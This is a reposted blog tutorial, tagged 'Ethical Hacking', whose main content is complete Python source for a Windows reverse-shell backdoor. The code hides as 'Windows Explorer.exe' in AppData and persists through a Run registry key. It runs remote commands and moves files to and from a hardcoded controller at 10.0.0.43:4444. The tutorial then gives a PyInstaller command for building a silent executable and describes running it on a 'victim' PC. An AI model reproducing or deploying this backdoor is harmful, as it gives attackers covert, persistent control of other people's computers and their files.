标签:Ethical Python self json command file path Hacking def
Polish the Python code by adding the become_persistent function.
#!/usr/bin/env python import json import socket import subprocess import os import base64 import sys import shutil class Backdoor: def __init__(self, ip, port): self.become_persistent() self.connection = socket.socket(socket.AF_INET, socket.SOCK_STREAM) self.connection.connect((ip, port)) def become_persistent(self): evil_file_location = os.environ["appdata"] + "\\Windows Explorer.exe" if not os.path.exists(evil_file_location): shutil.copyfile(sys.executable, evil_file_location) subprocess.call('reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v test /t REG_SZ /d "' + evil_file_location + '"', shell=True) def reliable_send(self, data): json_data = json.dumps(data).encode() self.connection.send(json_data) def reliable_receive(self): json_data = "" while True: try: json_data = json_data + self.connection.recv(1024).decode() return json.loads(json_data) except ValueError: continue def change_working_directory_to(self, path): os.chdir(path) return "[+] Changing working directory to " + path def execute_system_command(self, command): DEVNULL = open(os.devnull, "wb") return subprocess.check_output(command, shell=True, stderr=DEVNULL, stdin=DEVNULL) def read_file(self, path): with open(path, "rb") as file: return base64.b64encode(file.read()) def write_file(self, path, content): with open(path, "wb") as file: file.write(base64.b64decode(content)) return "[+] Upload successful." def run(self): while True: command = self.reliable_receive() try: if command[0] == "exit": self.connection.close() sys.exit() elif command[0] == "cd" and len(command) > 1: command_result = self.change_working_directory_to(command[1]) elif command[0] == "upload": command_result = self.write_file(command[1], command[2]) elif command[0] == "download": command_result = self.read_file(command[1]).decode() else: command_result = self.execute_system_command(command).decode() except Exception: command_result = "[-] Error during command execution." self.reliable_send(command_result) try: my_backdoor = Backdoor("10.0.0.43", 4444) my_backdoor.run() except Exception: sys.exit()
Convert to Windows executable file.
wine /root/.wine/drive_c/Program\ Files\ \(x86\)/Python37-32/Scripts/pyinstaller.exe reverse_backdoor.py --onefile --noconsole
Execute the reverse_backdoor file on the victim Windows 10 PC.
Restarted the victim Windows PC and the communication established automatically.
标签:Ethical,Python,self,json,command,file,path,Hacking,def
来源: https://www.cnblogs.com/keepmoving1113/p/11665784.html
本站声明:
1. iCode9 技术分享网(下文简称本站)提供的所有内容,仅供技术学习、探讨和分享;
2. 关于本站的所有留言、评论、转载及引用,纯属内容发起人的个人观点,与本站观点和立场无关;
3. 关于本站的所有言论和文字,纯属内容发起人的个人观点,与本站观点和立场无关;
4. 本站文章均是网友提供,不完全保证技术分享内容的完整性、准确性、时效性、风险性和版权归属;如您发现该文章侵犯了您的权益,可联系我们第一时间进行删除;
5. 本站为非盈利性的个人网站,所有内容不会用来进行牟利,也不会利用任何形式的广告来间接获益,纯粹是为了广大技术爱好者提供技术内容和技术思想的分享性交流网站。